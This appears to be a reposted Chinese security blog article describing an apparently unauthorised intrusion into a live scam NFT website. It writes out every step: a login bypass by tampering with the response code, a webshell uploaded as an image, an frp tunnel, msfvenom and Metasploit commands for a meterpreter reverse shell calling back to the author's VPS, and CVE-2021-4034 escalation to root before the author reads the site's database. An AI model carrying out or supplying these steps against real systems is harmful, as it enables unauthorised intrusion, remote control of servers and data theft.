服务粉丝

我们一直在努力
当前位置:首页 > 财经 >

实战杀猪盘渗透测试

日期: 来源:菜鸟学信安收集编辑:一点我爱你110

这是一个主打数字藏品的网站元宇宙妥妥的割韭菜,关于这个网站也是无意间找到的。

看起来非常假的网站这个网站是没有cdn的用的是thinkphpk框架搭建的。

先打一波poc没有效果,

访问一下后台直接在url后面加/admin。

一个开源的cms还没有验证码尝试用burp进行爆破,首先在火狐上设置代理ip为127.0.0.1代理端口为8081。

Burp上也要设置端口为8081,将Intercept设置为on输入账号密码点击登录就能拦截到数据包。

在爆破之前先发送到Repeater模块发送看看反应。

用户不存在返回code为1的响应码,尝试拦截返回包把1改为0。

成功登录后台,这应该是个前端js验证非常的不安全。

尝试找上传点,点击用户管理-编辑-上传头像,上传一张jpg文件在用burp抓包改为php将内容改为冰蝎马。

成功上传链接冰蝎马。

想办法上线到msf提权,这里就使用frp内网穿透,在我的vps开启frp。

./frps -c frps.ini

在内网上的kali进行设置

设置配置文件将8000端口的流量转到kali的6666端口。

启动客户端

./frpc -c frpc.ini

生成msf木马ip和端口要填vps的

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=****  LPORT=8000  -f elf > shell.elf

这里的lhost 应为服务器地址 LPORT 为反向代理端口,将shell.elf上传到/www/wwwroot/目录设置权限为777。

打开msf进行监听

use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 6666
exploit

运行shell.elf

./shell.elf

成功返回会话。

使用模块run post/multi/recon/local_exploit_suggester进行漏洞查询。

使用cve-2021-4034提权,切换到linux shell下面然后进到/tmp目录下下载脚本。

git clone https://github.com/berdav/CVE-2021-4034.git

似乎不行卡住了直接上传上去吧。

upload /home/kali/Desktop/CVE-2021-4034  /tmp/

进入shell

cd /tmp

make

chmod 777 cve-2021-4034

./cve-2021-4034

返回root权限。

查看database.php文件链接数据库发现基本上也没有人充值,看到一个账号40w的就是这家所谓数字藏品公司的老总。

登进入尝试体现均提示账户金额异常看来是跑路了,加了它们的官方群进入一看全是讨钱的

在这里提醒一下各位这种所谓的数字藏品都是骗局根本提不出来钱的。

作者:一点我爱你110, 转载请注明来自FreeBuf.COM



相关阅读

  • WireShark从入门到放弃

  • WireShark是一款网络封包分析工具。用于分析网络数据包,功能十分强大。他的强大之处在于它不仅能捕获数据包,还能对捕获的数据进行进一步的分析。需要注意的是,wireshark能获取
  • Javalin:一个轻量的 Web Framework

  • (给ImportNew加星标,提高Java技能)说起 Java 语言下的 Web 框架那就非 Spring Framework 不可了,但是今天在和别人在聊天的过程中发现了一个新奇的项目 Javalin。Javalin 是一个
  • SNOWKIDS品牌 PD+QC3.0 双端口壁式充电器

  • ---爱扫货发车第 1538 期---产品介绍SNOWKIDS品牌全新带包装盒到货,原价34.5元/个,现上车团购价一个仅需19.9元!!【PD+QC3.0 双端口壁式充电器】USB 壁式充电器(最大总功率 30W),具
  • Elecife 品牌12合一扩展坞,出口品质,超低价格

  • ---爱扫货发车第 1542 期---前言大家催爆的12合一扩展坞来啦,跨境电商转内销,Elecife品牌12合一扩展坞,可为C口设备拓展多种接口,让生活更方便,办公更轻松。发车价优,赶紧上车!!其中
  • 计算中心推出区块链基础服务及平台产品

  • 当前,我国已经进入数字经济发展的快车道,数字产业化、产业数字化相互促进、共同融合,构成了数字经济的基础。区块链作为“信任的机器”, 蕴含着巨大的变革潜力,不仅是数字经济的
  • 一个文件上传漏洞靶场

  • 前言这篇文章是关于一个上传漏洞靶场的挑战译文,原文链接如下:https://github.com/frank-leitner/tryhackme/tree/main/Upload_Vulnerabilities靶机说明:步骤Web应用程序是一组
  • 实战|记一次横向移动渗透测试

  • | 作者:windcctv,转自FreeBuf.COM本次渗透在几个docker虚拟机间多次横向移动,最终找到了一个可以进行docker逃逸的出口,拿下服务器。渗透过程曲折但充满了乐趣,入口是172.17.0.6

热门文章

  • “复活”半年后 京东拍拍二手杀入公益事业

  • 京东拍拍二手“复活”半年后,杀入公益事业,试图让企业捐的赠品、家庭闲置品变成实实在在的“爱心”。 把“闲置品”变爱心 6月12日,“益心一益·守护梦想每一步”2018年四

最新文章

  • 实战杀猪盘渗透测试

  • 这是一个主打数字藏品的网站元宇宙妥妥的割韭菜,关于这个网站也是无意间找到的。看起来非常假的网站这个网站是没有cdn的用的是thinkphpk框架搭建的。先打一波poc没有效果,访
  • 实战|微信小程序渗透技巧

  • 微信小程序小程序测试流程分为两个方面,解包可以挖掘信息泄露问题、隐藏的接口,抓包可以测试一些逻辑漏洞、API安全问题。两者结合起来就可以边调试边进行测试,更方便于安全测
  • 一个暗网情报数据抓取工具

  • DarkScrape介绍DarkScrape是一个公共资源情报工具,用于在Tor站点(暗网)中查找媒体链接。DarkScrape测试过的系统Kali Linux 2019.2Ubuntu 18.04NethunterArc Linux测试过表示可
  • 美国:我是被迫的;德国:胡说

  • 据德媒报道,针对美国白宫官员日前声称“美国是迫于德国的要求才向乌克兰提供M1主战坦克”的说法,德方进行了反驳。 德国联邦政府新闻副发言人2月27日表示,向乌克兰共同交付主战
  • 允许停靠!

  • 据今日俄罗斯电视台(RT)网站27日报道,面对来自美国方面的压力,巴西仍决定允许两艘伊朗军舰在该国港口停靠。 报道称,巴西海军副参谋长、海军中将卡洛斯·爱德华多·奥尔塔·阿伦
  • 实战|记一次web登录通杀渗透测试

  • 0x01 记一次web渗透在渗透测试过程中,碰见的web登录页面特别多,那么我们应该用什么样的思路去进行一个测试呢,下面看看我的一些测试师思路ba0x02 测试思路当看见一个这样的web